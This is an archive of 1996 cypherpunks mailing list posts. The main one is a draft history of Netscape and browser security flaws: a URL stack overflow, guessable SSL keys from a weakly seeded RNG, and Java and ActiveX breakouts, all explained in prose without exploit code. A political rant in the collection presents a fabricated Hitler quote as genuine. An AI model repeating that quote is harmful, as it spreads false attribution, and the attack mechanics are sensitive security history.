[Vogelheim 1996] Daniel Vogelheim, "RRC.2 implementation available", posting to
sci.crypt newsgroup, message-ID <4g5u20$e4k@news.rwth-aachen.de>, 19 February
1996.

[Young 1996] Eric Young, "Bank transactions on Internet", posting to
cypherpunks mailing list, message-ID
<Pine.SOL.3.91.960409104403.28771C-100000@orb>, 9 April 1996.


(In)Secure Internet Electronic Commerce
---------------------------------------

After the RC4 attacks, researchers looked for other weaknesses in Netscape.  In
September 1995 it was discovered that Netscape didn't check the amount of input
it was fed, leading to internal buffers being overrun [Green 1995] [Neumann
1995].  This bug also existed in other browsers such as Mosaic and IBM's
WebExplorer.  By carefully adjusting the data fed to the browser, it was
possible to force a victims PC to execute arbitrary code simply by selecting a
URL.  This problem has occurred in the past in a number of other programs such
as fingerd (where it was exploited by the Internet worm [Spafford 1988]), the
CERN and NCSA httpd's (as explained below in the section [!!!!]), and recently
splitvt, syslog, and mount/umount, leading one exasperated mailing-list
moderator to wonder how many more times he'd see this problem [Bloodmask 1996].
The flaw in question can be exploited by ensuring that the code to be executed
is located in the URL at a point where it overflows the end of the buffer.  A
URL can contain almost any data value except for a few characters which have
special significance and a binary zero, a restriction which can easily be
bypassed by selecting alternative encodings for any instructions which cause
problems.  The browser stack looks as follows:

[Diagram: URL buffer, other data, callers saved program counter]

It is therefore possible, by making the URL long enough to overwrite the other
data and saved program counter, to force a jump to an attackers code rather
than returning to the calling routine, allowing an attacker to force the
execution of arbitrary code on the victims machine.  Although this exploit is
machine and browser-specific, by targetting the most common architecture
(Windows on an Intel processor) and browser (Netscape), a reasonable chance of
success can be obtained.

At about the same time the stack overwrite problem was discovered, a basic flaw
was found in Netscape's SSL implementation which reduced the time to break the
encryption from hours to minutes.  Despite an existing body of literature
covering the need for carefully selected random-number generation routines for
cryptographic applications [Eastlake 1994] [IEEE 1995] [Robertson 1995], one of
which even included ready-to-use code [Plumb 1994], Netscape used fairly simple
methods which resulted in easy-to-guess encryption keys [Goldberg 1995]
[Goldberg 1996].  It was found that, under Unix, Netscape used a combination of
the current time in seconds and microseconds and the process ID of the current
and parent process to initialise the random number generator which produced
master encryption keys. The time can be determined to a reasonable degree of
accuracy from the message being sent, the process ID's can be determined using
standard Unix utilities (by people using the same machine that Netscape is
running on), or by using other tricks such as the fact the an approximate
process ID can often be obtained by observing the output of other
network-related programs on the machine, and the parent process ID is often 1
(for example when Netscape is started from an X-windows menu) or close to the
process ID.  Under Windows the implementation was similarly flawed.

The resulting number of values to search are smaller than the number of
combinations in a 40-bit key, and much smaller than the number of combinations
in the 128-bit key in the export-restricted version. Since Netscape never
reseeds its internal random number generator, subsequent connections are
relatively easy to break once the first one is broken.  The researchers who
discovered this problem released a program, unssl [unssl 1995] which would
break Netscape's encryption (both the weak exportable version and the strong
export-restricted version) in about a minute on an average workstation.
Although one of the researchers classed it as "a silly bug", it received large
amounts of media attention, including front-page coverage in the New York Times
[Markoff 1995] and coverage in the Wall Street Journal [Sandberg 1995] and
Daily Telegraph [Uhlig 1995].

Attempts to fix this problem introduced yet more problems.  Under Windows the
browser and server code, which appear to share the same random number code,
don't close some of the file handles they use.  While this has no serious
effect on the client software (which doesn't run over extended periods of
time), it does effect the server, which after a period of time runs out of file
handles so that a number of calls related to gathering random data (some of
them not apparently file-related) quietly fail, significantly weakening the
random-number generation process [RingZero 1995].  The problem of insecure
random number generation was not unique to Netscape, and has in the past beset
XDM (which generates weak xauth keys), Netrek (a network game which generates
guessable RSA private keys), an earlier version of the SecuDE security toolkit
(which again generated guessable RSA keys), and Sesame (a european Kerberos
clone) which uses it to generate DES keys.

Significant security holes are also opened up through the use of Java, which
allows arbitrary programs downloaded from the net to run in a (supposedly)
controlled environment on a host PC.  By breaking out of this controlled
environment, Java applets can act as trojan horse programs on the PC, bypassing
normal security measures.  The consequences of these security problems have
been widely reported and include the destruction of data [Clark 1996], the
ability to access arbitrary files on the system [Felten 1996b], the ability to
forward sensitive information to arbitrary machines on the net (bypassing
firewalls and similar measures, since the "attack" comes from a trusted machine
inside the security perimeter) [Williams 1996] [Markoff 1996], or even run
arbitrary native code on the machine [Felten 1996a] [Hopwood 1996] [Kennedy
1996].  This last class of flaws are the most serious, since they allow any
code to be executed on a victims machine.  The problem was in the class loading
code for the browser and affected all then available browsers rather than just
Netscape, and could be carried out simply by a victim viewing a web page
containing the hostile Java applet.

Java problems can be combined with other attacks such as DNS spoofing (in which
a fake address for a target machine is advertised), allowing a Java applet to
connect to a normally disallowed target machine since the Java security manager
thinks it is connecting to a safe system [Mueller 1996].  Other problems are
less subtle, and can crash the browser (and, under some versions of Windows,
the operating system as well) simply by connecting to a web page [Ref:
Browser-crashing pages].  One report comes to the conclusion that "because of
the wonderful power of the Java language, security problems are likely to
continue" [Neumann 1996].

These problems are not unique to Java.  Microsoft's ActiveX has experienced
similar troubles, exemplified by a sample application which shuts down the
machine, and even turns off the power on systems which support this
functionality [McLain 1996].  The problems extend beyond Java and ActiveX to
other kinds of embedded executable content as well.  For example the ability to
embed macros in documents viewed and downloaded by a browser, in combination
with security holes in the browser, allows an attacker to execute arbitrary
code on a victims system whenever they view the attackers web page [Felten
1996c].  Although this was subsequently fixed, the solution was to issue
warnings for all local files as well as remote downloads, so that after the
first dozen or so messages the user was likely to simply automatically click
"OK" whenever another warning popped up [Walsh 1996].  In addition a hostile
application could access the Windows registry (the system-wide database of
configuration options) to quietly disable the warnings.  This creates a nice
niche for "espionage-enabling" viruses which disable or patch various security
features in operating systems or application software to allow later attacks.
At least one security organisation already uses such a program, a modified
stealth virus, for this purpose.

-> Mention that these are all seperate problems, not the same ref over and
   over.


[Clark 1996] Don Clark, "Researchers Find Big Security Flaw In Java Language"
The Wall Street Journal, 26 March 1996, p.B4.

[Bloodmask 1996] `Bloodmask', "Vulnerability in ALL linux distributions",
posting to linux-alert mailing list, 30 July 1996.

[Eastlake 1994] Donald Eastlake, Stephen Crocker, Jeffrey Schiller, "Randomness
Recommendations for Security", RFC 1750, December 1994.

[Felten 1996a] Ed Felten, "Security Flaw in Netscape 2.02", Risks-Forum Digest
Vol.18, Issue 13, 17 May 1996.

[Felten 1996b] Ed Felten, "Java security update", Risks-Forum Digest, Vol.18,
Issue 32, 13 August 1996.

[Felten 1996c] Ed Felten "Internet Explorer Security Problem", Risks-Forum
Digest, Vol.18, Issue 36, 21 August 1996.

[Goldberg 1995] Ian Goldberg, "Netscape SSL implementation cracked!", posting
to cypherpunks mailing list, message-ID:
<199509180441.VAA16683@lagos.CS.Berkeley.EDU>, 18 September 1995.

[Goldberg 1996] Ian Goldberg and David Wagner, "Randomness and the Netscape
Browser", Dr.Dobbs Journal, January 1996, p.66.

[Green 1995] Heather Green, "Netscape Says Hackers Uncover 3rd Flaw in Its
Internet Software", The New York Times, 25 Sep 1995.

[Hopwood 1996] David Hopwood, "Another Java security bug", posting to
comp.lang.java newsgroup, message-ID <4orf1q$t6f@news.ox.ac.uk>, 2 June 1996.

[IEEE 1995] IEEE P1363 Appendix E, "Cryptographic Random Numbers", Draft
version 1.0, 11 November 1995.

[Kennedy 1996] David Kennedy, "Another Netscape Bug US$1K", Risks-Forum Digest,
Vol.18, Issue 1422, May 1996.

[Markoff 1995] John Markoff, "Security Flaw Is Discovered In Software Used in
Shopping", The New York Times, 19 September 1995, p.A1.

[Markoff 1996] John Markoff, "New Netscape Software Flaw Is Discovered", The
New York Times, 18 May 1996, p.31.

[McLain 1996] Fred McLain, "ActiveX, or how to put nuclear bombs in web pages",
http://www.halcyon.com/mclain/ActiveX/.

[Mueller 1996] Marianne Mueller, "Java security", Risks-Forum Digest,  Vol.17,
Issue 79 23 February 1996.

[Neumann 1995] Peter Neumann, "Third Netscape weakness found", Risks-Forum
Digest, Vol.17, Issue 36, 27 September 1995.

[Neumann 1996] Peter Neumann, "More Java, JavaScript, and Netscape problems",
in "Security Risks in Computer-Communication Systems", ACM SIGSAC Review,
Vol.14, No.3 (July 1996), p.22.

[Plumb 1994] Colin Plumb, "Truly Random Numbers", Dr.Dobbs Journal, November
1994, p.113.

[RingZero 1995] `RingZero', "NEW Netscape RNG hole", posting to cypherpunks
mailing list, message-ID <9510080732.AA14015@anon.penet.fi>, 8 October 1995.

[Robertson 1995] Richard Robertson, "Random Number Generators Draft", IEEE
P1363 Random Number Generators Review Group, May 1995.

[Sandberg 1995] Jared Sandberg, "Netscape's Internet Software Contains Flaw
That Jeopardizes Security of Data", The Wall Street Journal, 19 September 1995.

[Spafford 1988] Gene Spafford, "The Internet Worm: Crisis and Aftermath",
Communications of the ACM, Vol.32, No.6 (June 1989), p.678.

[Uhlig 1995] Robert Uhlig, "Security threat to Internet shopping", Daily
Telegraph, Daily Telegraph (paper edition), 3 October 1995, p.12.

[unssl 1995] ftp://ftp.csua.berkeley.edu/pub/cypherpunks/cryptanalysis/unssl.c.

[Walsh 1996] Mike Walsh, "Microsoft's warning", Risks-Forum Digest, Vol.18,
Issue 38, 26 August 1996

[Williams 1996] Eric Williams, "New Netscape 2.0/2.01 Security Issue (Java
Sockets)", posting to comp.lang.java newsgroup, message-ID
<4jppdt$ake@sky.net>, 1 April 1996.

[WSJ 1996] The Wall Street Journal, "Princeton Team Finds Bug In Part Of
Netscape Program", 20 May 1996. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 12 Sep 1996 16:13:58 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Bubba Bottoming out on Cocaine Paranoia?
In-Reply-To: <199609110733.DAA04996@unix.asb.com>
Message-ID: <199609120534.XAA06832@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain



        another paranoid fantasy and impending preemptive strike 
    by Bubba, or by the NWO?

        BTW, I really do not care how the NWO is defined --big 
    government serving its own interests works just as well, so 
    forget flaming me on the NWO.  please do keep in mind, however,
    that the CFR has a undue amount of influence in Washington and
    the CFR is the bastion of established wealth.

        this is a blatant statement that our government ("of and 
    for the people") has every intention of fully controlling the 
    content of * everything * we see. The five media conglomes 
    already toe the line in the interests of the NWO.  

        What the NWO failed to consider in their plans was the 
    explosion of the net, and * free * information --the inability 
    of the ruling order to control the news, and stifle mass 
    market criticism before it becomes a topic of general 
    discussion.

        Bubba's mouthpiece uttered the classic incompetent 
    government under attack mentality response to the problem: 
    "...hey, joe criminal uses sophisticated computer encryption 
    to plot his crimes.  why must we be subject to criminals?  
    let's ban all communication [we can not control]...."

        the suggestion that if commerce was permitted secure 
    cryptography, secure servers, and able to develop its own 
    safety net, the incentive would then not be worth the cost of
    the mob cracking the codes (they would be reduced back
    to the usual reliance on an inside job which, will be harder 
    and harder with better security)

        No, but that solution does not serve the purpose of statist 
    governments controlling * everything * 

        personally, I am even more pessimistic than that: 

        America is being destroyed by the actions of our leaders 
    and their puppet-meisters: 

        1.  the rewriting of educational textbooks by grant 
            dependent university professors.

        2.  the rewrite of history to reflect not only the 
            politically correct views, but to reflect history as 
            the elite wish to see it --even to the point of 
            rewriting quotations of Thomas Jefferson to suit their
            purpose.

        3.  the destruction of the means of investment by 
            permitting an "unregulated" economy built on the 
            greed of a elitist "core" of stock brokers who block 
            consumer actions until their own manipulations have set 
            the pace for their own gains.

        4.  the destruction a solvent government by the debt-based 
            economy of the Federal Reserve Bank which is not even
            owned by the central government.

        5.  the destruction of the educational system by reverting
            to education by the lowest common denominator. how can 
            young adults who graduate from high school with an 
            education which leaves them functionally literate 
            enough to take a driver's license and mathematically 
            skill only well enough to balance a check book be 
            consider "educated, well-informed" citizens?

        6.  the destruction of any work-incentive by the 
            establishment of a welfare society.  the message today 
            is that it is "socially acceptable" to accept the dole; in

            fact, it is preferable to demeaning oneself with 
            entry-level work.

        Is it any wonder why the U.S. has dropped below #20 in the 
    educational sweepsteaks of "Western" culture.

        The result is a population base which is Joe-Six-Pack * at 
    best, *  functional to the point of being able to turn on a TV 
    for 18 hours a day --the average viewing time of the American 
    public is now 7.2 hours * per day, * according to one recent
    report.  

        Another reports states that the average 6 year old today 
    has seen >2,000 murders...   is there any question why there 
    is no value on life?

        bubba is acting with "fear" as his motto.  Dole wants to 
    literately wipe out drugs, even to the point of putting a 
    soldier on every street corner.

        are we down to this? 

            1935 will go down in history! 

            For the first time a civilized nation has full gun
registration! 
            Our streets will be safer, our police more efficient, and
the 
            world will follow our lead in the future! 

                --Adolf Hitler

      46. The U.S. government declares a ban on the possession, 
      sale, transportation, and transfer of all non-sporting 
      firearms.   ...Consider the following statement:
      
            I would fire upon U.S. citizens who refuse or resist 
            confiscation of firearms banned by the U.S. government. 
 
                --The USMC 29 Palms Combat Arms Survey 

        The survey was given to virtually all special combat units 
    of the Marine Corps (including my son), USArmy special units, 
    Navy Seals, &c.  depending on which survey, there were 42 
    to 54 questions; the government told the men that the major 
    giving the "quiz" was doing a master's paper, or some such 
    poppycock.

        The government's intent is clear, the above is how they 
    intend to enforce it, and either we stop it now, or there will
    be no stopping it.  guns are a part of it since it denies the 
    ability of "We, the people..." to take offensive action against 
    the government with even reasonable _personal_ firepower 
    --never mind the sophistication of the government arsenal.  
    The only thing in the peoples' favour is that guerilla warfare 
    is extremely difficult to deal with.

        Why has it gone this far?  because Joe-Six-Pack will sell 
    all his freedom in return for the promised security.  whose is 
    the Judas goat?  the captive press.

        there is no need to subscribe to conspiracy theories 
    --there are enough facts of the table that conspiracies are 
    irrelevant.

        but, the statement that a "wired world will 'diminish national

    sovereignty' is absolutely true --governments might just be fully 
    accountable.
    

one of the few things we all share: 
  the utter, corrosive contempt for our elected officials.


=------- Forwarded Message Follows from Edupage of 10 Sep -------

=WIRED WORLD WILL "DIMINISH NATIONAL SOVEREIGNTY"
=A leading Clinton Administration official on information security and
=cryptography matters says that traditional notions of sovereignty,
=national security and warfare will be undermined by the year 2020,
=when the whole world is "wired" and e-cash is the norm.  The result
=will be less powerful governments in relation to criminal
=organizations such as the Mafia and international drug cartels, says
=Michael Nelson, who adds that organized crime members are already
=some of the most sophisticated users of computer systems and strong
=encryption technology.  In addition, computer crackers will pose a
=more significant threat.  In response, Nelson advocates resolving the
=issue of whether unauthorized access of a computer is an "act of
=trespass" or an "act of war," and prosecuting the intrusions
=accordingly. (BNA Daily Report for Executives 6 Sep 96 A14)
= (Courtesy of Edupage)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Thu, 12 Sep 1996 22:17:27 +0800
To: raph@kiwi.cs.berkeley.edu
Subject: New type2.list/pubring.mix
Message-ID: <199609121101.GAA18549@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


I just updated the type2.list/pubring.mix combination on jpunix.com to 
reflect the disappearance of the ncognito remailer. I've been getting 
nothing but bounces and the owner doesn't seem to be around to fix it. 
The updated lists can be obtained by WWW from www.jpunix.com and by 
anonymous FTP from ftp.jpunix.com.
-- 
 John Perry KG5RG perry@alpha.jpunix.com PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Fri, 13 Sep 1996 02:59:27 +0800
To: cypherpunks@toad.com
Subject: [BOOK] Competitive Intelligence
Message-ID: <199609121420.HAA14936@well.com>
MIME-Version: 1.0
Content-Type: text/plain



                    Competitive Intelligence

                 "From Black Ops to Boardrooms-
       How Businesses Gather, Analyze, and use Information
             to Succeed in the Global Marketplace."

                       ISBN 0-684-81074-3
                   Simon and Schuster ($24.00)


Preface: Being a Hero and not a Bum


Part One: What is Competitive Intelligence?


1.) The Rise of Competitive Intelligence

2.) What Competitive Intelligence can do for your                 
    company: Information vs Intelligence

3.) Why most managers are still stuck in the information age


Part Two: Real-World Competitive Intelligence


4.) The Intelligence Cycle

5.) Planning and Direction

6.) Collection

7.) Analysis

8.) Dissemination

9.) Mergers and Acquistions

10.) Benchmarking and Competitive Intelligence

11.) How the Japanese Perform Competitive Intelligence

12.) Competitive Intelligence in other Countries

13.) Building a Competitive Intelligence System


Part Three: Issues, Opportunities, and the Future


14.) Justifying the cost of Competitive Intelligence

15.) Using Competitive Intelligence in the European Union

16.) Ethics

17.) The New Gatekeepers

18.) Why the U.S. Government must get involved in Competitive     
Intelligence

19.) Competitive Intelligence-The Next Generation

Glossary of Competitive Intelligence





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 13 Sep 1996 00:27:45 +0800
To: declan@eff.org (Declan McCullagh)
Subject: Re: What is best policy paper on crypto?
In-Reply-To: <Pine.SUN.3.91.960911201759.26035J-100000@eff.org>
Message-ID: <199609121242.HAA05004@homeport.org>
MIME-Version: 1.0
Content-Type: text


Declan McCullagh wrote:
| I happen to know that an influential Congresspern will be meeting with
| some Cato folks tomorrow morning, so I'm assuming this isn't an idle 
| request. 
| 
| -Declan

	The NAS report, despite a few silly points, does push for
liberalization of the export regime, standardization, a switch to
an 'assume export' stance, states that the debate can be carried out
in public, and that classified information is not needed, and suggests
that crypto can help reduce many threats to Americans.

	It does not suggest abolishing the ITARs, and suggests
consideration of a law criminalizing the criminal use of crypto.

	It is a balanced report, and has NSA, and attorney generals on
it.  Otherwise, I'd go with some of Whit's testimony before Congress.

	(Saw a presentation by Herb Lin yesterday at MIT.)

Adam


	

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 13 Sep 1996 12:09:32 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: [Long] A history of Netscape/MSIE problems
In-Reply-To: <84245818912499@cs26.cs.auckland.ac.nz>
Message-ID: <199609120716.IAA00231@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Peter Guttmann <pgut001@cs.auckland.ac.nz> writes on cpunks:
> [...]  The reason for the 40-bit key and (according to RSADSI, the
> company that developed RC4) the reason why details on it were kept
> secret was that these conditions were required under an agreement
> between the Software Publishers Association (SPA) and the US
> government which gave special export status to the RC4 algorithm and
> a companion algorithm called RC2.

Hadn't heard that before, that the trade secret requirement was
imposed on RSADSI.  What was your source for that info, it is an
interesting assertion on the part of RSADSI, and I am intrigued.

> [reverse engineer of RC4...]
> The results were posted to mailing lists and the Internet [Anon
> 1994a].  Someone with a copy of BSAFE tested it against the real
> thing and verified that the two algorithms produced identical
> results [Rescorla 1994], and someone else checked with people who
> had seen the original RC4 code to make sure that it had been
> (legally) reverse-engineered rather than (illegally) copied [Anon
> 1994b].

Some people held that it had been a licensed holder of RC4 source who
had posted it in violation of the license agreement.  I think I recall
that Tim May, may be others, argued this nearer the time.

That the code looked different isn't of itself proof that it was or
wasn't reverse engineered; it is entirely plausible for the anonymous
poster (if it was a source license violation) to have gone to some
pains to obscure this fact, by changing the appearance and style of
the code.

> [RC4 key schedule biases...]

You ought to reference Andrew Roos paper [posted to the list, and
sci.crypt, at least] analysing key schedule biases in RC4.  Paul
Kocher posted a response (this was in sci.crypt) saying that he had
discovered the same biases while working for RSADSI, (at a time before
RC4 was revealed, or at least before RSADSI started discussing RC4
publically, a tacit admission by them that alleged RC4 was RC4)

> Further improvements to the attack were proposed.  

Andrew Roos brutessl code was special case optimised for SSL, he
precomputed part of the MD5 digest, and progressed through the key
space in an order chosen to maximise the amount of MD5 precomputation
that could be done.  Something of interest, perhaps.

> The attacks on RC4 are a prime example of a publicity attack.  They were
> carried out by volunteers using borrowed machine time, noone (apart from
> Netscapes stock prices) was harmed, 

Strangly (I'm not sure if anyone lost money due to this), I think
Netscapes prices hardly suffered, perhaps even improved slightly.
Could be due to the `any publicity is good publicity' syndrome.  There
was a *lot* of publicity, and Netscapes response in fixing the problem
was good.  Several US cypherpunks were tracking the stocks at the
time, and could probably verify this.

One omission: you didn't say anything about Paul Kocher's timing
attack on RSA, which I think affected Netscape servers, and was fixed
after his publicizing the attack.  Then you could discuss Ron Rivest's
blinding solution, and the time delay solution.

Otherwise, excellent.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: #6 <thevillage@void.gov>
Date: Fri, 13 Sep 1996 03:48:41 +0800
To: cypherpunks@toad.com
Subject: PANIX.COM down: denial of service attack
Message-ID: <323835AE.6EA6@void.gov>
MIME-Version: 1.0
Content-Type: text/plain


WSJ 9/12/96

Paraphrasing:

Panix has been under attack for the last week by someone flooding
their server with bogus "requests for information" [see below] ...

The attack(s):

* "Have rendered almost defenseless the small NY company"
* "...began late Friday afternoon ... were still continung yesterday"
* have targeted "computers that control WWW pages, store e-mail, and 
still others that link Internet addresses to Panix subscribers."

"The hacker [sic] has been sending up to 150 requests a second to 
Panix's computers, seeking to establish a connection ... the requests, 
presumably generated by a malicious computer program, contain fake 
Internet addresses, which the computer must sort out before they can 
discard them.  The computers have choked under the deluge."

"As to who might be targeting Panix, the firm's Mr. Rosen speculated it 
could be someone upset by the fact that the site hosts, free, the Web 
site for Voters Telecommunication Watch...."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Fri, 13 Sep 1996 05:55:55 +0800
To: cypherpunks@toad.com
Subject: [BOOK] "Competitive Intelligence"  corrected
Message-ID: <199609121612.JAA25760@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Sorry, forgot the Author...

Brian

"Car Bombs- The poor mans cruise missle."


                    Competitive Intelligence
                         
                         Larry Kahaner

                 "From Black Ops to Boardrooms-
       How Businesses Gather, Analyze, and use Information
             to Succeed in the Global Marketplace."

                       ISBN 0-684-81074-3
                   Simon and Schuster ($24.00)


Preface: Being a Hero and not a Bum


Part One: What is Competitive Intelligence?


1.) The Rise of Competitive Intelligence

2.) What Competitive Intelligence can do for your                 
    company: Information vs Intelligence

3.) Why most managers are still stuck in the information age


Part Two: Real-World Competitive Intelligence


4.) The Intelligence Cycle

5.) Planning and Direction

6.) Collection

7.) Analysis

8.) Dissemination

9.) Mergers and Acquistions

10.) Benchmarking and Competitive Intelligence

11.) How the Japanese Perform Competitive Intelligence

12.) Competitive Intelligence in other Countries

13.) Building a Competitive Intelligence System


Part Three: Issues, Opportunities, and the Future


14.) Justifying the cost of Competitive Intelligence

15.) Using Competitive Intelligence in the European Union

16.) Ethics

17.) The New Gatekeepers

18.) Why the U.S. Government must get involved in Competitive     
Intelligence

19.) Competitive Intelligence-The Next Generation

Glossary of Competitive Intelligence





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Troy Varange <varange@crl.com>
Date: Fri, 13 Sep 1996 04:08:34 +0800
To: attila@primenet.com
Subject: Re: Bubba Bottoming out on Cocaine Paranoia?
In-Reply-To: <199609121502.JAA19550@InfoWest.COM>
Message-ID: <199609121637.AA08784@crl11.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


Are you familiar with the Jefferson Bible?  It's an excerpt and
rearrangement of the gospels to produce a more liberal effect.
It shows that Thomas Jefferson was into interpretation rather
than doctrinaire discipline.

And rather than "dispensing drugs in clinics," why not simply
scrap the drug laws entirely?  People have a *right* to do as
they please with their bodies.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Thu, 12 Sep 1996 18:37:05 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: Hacking Mobil Telephone System ?
In-Reply-To: <32371250.3F54BC7E@systemics.com>
Message-ID: <Pine.LNX.3.95.960912095811.257C-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain


> 
> ... but the semi automatics they carry are not much different to ones US
> cops have.

I thought the US cops also use H&K MP5 or such things.
The same as in Germany :)

> And *they'll* decide what sort of deal *they* want to offer.  They did
> say the money could be donataed to any non-profit organisation, so this
> covers a wide range of organisations (your school or university perhaps,
> or computer society, or even the Church of Scientology, The Vatican,
> Mitre Corp, NFL, etc. etc.).  I wonder if Radikal is a non-profit  :-)

Taken in account that they are leftist, they should be non-profit ;)

-stephan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Fri, 13 Sep 1996 04:50:06 +0800
To: cypherpunks@toad.com
Subject: Re: Child Porn as Thoughtcrime
Message-ID: <199609121707.KAA12179@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Rick Smith wrote:

> : ...the "little girls in leotards" case was only a few years ago, etc.)
> 
> Don't know about that one. Is it illegal for little girls to be
> photographed in leotards now? "Nutcracker" is X rated? Move over,
> Bambi.

   But this proves precisely Tim's original point, that child
pornography is a thoughtcrime.

   Here's a working definition of child pornography at the end of the
millenium: it's a picture of a child, in the hands of a pedophile.
Pictures of girls in leotarfds are not child pornography per se, but
if you think evil thoughts while watching them, then they become child
pornography. What got Stephen Knox in trouble was leaving so much
evidence that he was thinking those evil thoughts.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jseiger@cdt.org (Jonah Seiger)
Date: Fri, 13 Sep 1996 02:44:24 +0800
To: cypherpunks@toad.com
Subject: Sen. Burns' statement on postponement of Crypto vote today.
Message-ID: <v02140b04ae5dc661122e@[204.157.127.4]>
MIME-Version: 1.0
Content-Type: text/plain


As you may have heard by now, the Senate commerce committee markup of the
Burns/Leahy "Pro-CODE' bill, originally set for today, has been postponed.
Indications from the Commerce Committee staff are that this was largely due

to scheduling issues, although end-of-the-session politics are also playing
a role.

Both the Committee staff and Senator Burns himself (see note below) have
said they are committed to holding a markup before the end of the session.
We expect more information early next week and will post updates as soon as
new information becomes available.

Senator Burns asked us to forward the following note to the net.community:

>X-POP3-Rcpt: jseiger@mailserver
>From: Conrad_Burns@burns.senate.gov
>Date: Thu, 12 Sep 96 09:55:35 EST
>To: jseiger@cdt.org
>Subject: Open Letter to the Internet from Senator Burns
>
>     The Commerce Committee markup on Pro-CODE, S. 1726, that we had
>     expected to have held on Thursday, September 12 has been postponed.  I
>     am fully committed to taking Pro-CODE to markup, out of committee and
>     onto the floor of the Senate in this Congress.  I believe that this
>     legislation is vital to ensuring the continued strength of America's
>     high-tech community and the privacy of its citizens.  I would like to
>     thank the many thousands of Netizens who have expressed their support
>     for Pro-CODE.
>
>     Sincerely,
>
>     U.S. Senator Conrad Burns
>

Please keep your phone calls coming to the Senate Commerce Committee
members offices, and be sure to sign the petition at
http://www.crypto.com/petition/.
A coalition alert with more information will be posted soon.

Jonah

  ** THE FIGHT FOR FREE SPEECH ONLINE CONTINUES TO THE SUPREME COURT **
      It's not too late to be a part of history -- Join the Lawsuit
         <http://www.cdt.org/ciec>   --    <ciec-info@cdt.org>

--
Jonah Seiger, Policy Analyst           Center for Democracy and Technology
<jseiger@cdt.org>                           1634 Eye Street NW, Suite 1100
                                                      Washington, DC 20006
PGP Key via finger                                     (v) +1.202.637.9800
http://www.cdt.org/                                    (f) +1.202.637.0968
http://www.cdt.org/homes/jseiger/








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Admin <admin@superhot.com>
Date: Fri, 13 Sep 1996 04:52:12 +0800
To: Andy Dustman <andy@CCMSD.chem.uga.edu>
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
Message-ID: <199609121640.KAA19040@rintintin.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain


At 09:34 PM 9/11/96 -0400, you wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Wed, 11 Sep 1996, Admin wrote:
>
>> >This is an absurd and inaccurate analogy. The mailBot simply pushes
>> >*mailto:* tags that people have willingly placed on their public websites.
>> >They invite the mail so a more accurate analogy would be that City Hall puts
>> >up a public suggestion box and invites comments. The bot then puts one, and
>> >only one, unsigned anonymous suggestion into the box. It then goes on to the
>
>You're sending out messages, inviting people to visit your web site, but
>you're using anonymous remailers because... you don't want people to know
>who you are?


Perhaps he's sending out through the remailers...because he can. Its open to
the public. Or perhaps he's trying to get the word out about remailers also,
or perhaps no one but he knows why, and why is unimportant. You can always
make your remailers a private, pay per use club. Then you could control all
the *whys* *whens* and *hows*.



>Then why invite them to your site (or even have a site)? It's
>like if I sent out postcards to people with no return address saying,
>"Please stop by 1313 Mockingbird Lane for snacks and refreshments. Signed,
>A Friend". (Note, this is not my real address.) 

>Only in this case the
>postcards don't have any stamps so the people who receive them have to pay
>the postage. Which is precisely what you're doing: Sending someone e-mail
>costs them time and it often costs them money.

These people have invited the email, and the associated expense, by placing
a public email-to: button on their public www page. A more acurate analogy,
and to the point, would be if a business sends you a postage pre-paid
business reply card, that is blank, and invites your comments on the card.
They can hardly complain of the expense when people actually send it in,
even if they don't like the comments.


>Sending it through an
>anonymous remailer accomplishes four things: 1) People can't complain to
>you to stop sending them mail.

Seems anyone who followed the link can complain to the appropriate source.


>2) It costs us, the International Secret
>Cabal of Anonymous Remailer Operators, time and money for no good reason,
>because you are sending anonymous mail and not making yourself anonymous.

Didn't see any disclaimers on the remailers requiring a *good reason* to use
them. Who would be this Judge of Sufficiently Good Reason? Perhaps you can
write an AI piece that can auto-detect good reason from *no good reason*...


>3) You're pissing off a bunch of people, and the only ones they can take
>their frustrations out on or complain to is us. 

What is the ratio of *pissed off people* to not pissed off people. Likely
less than 0.5% based on how many messages the Cpunks claim went out in a day.



>4) It's giving us a bad
>rap, man, and that's the *last* thing the remailer net needs now.

The saying goes...There is Heat in the Kitchen...


>
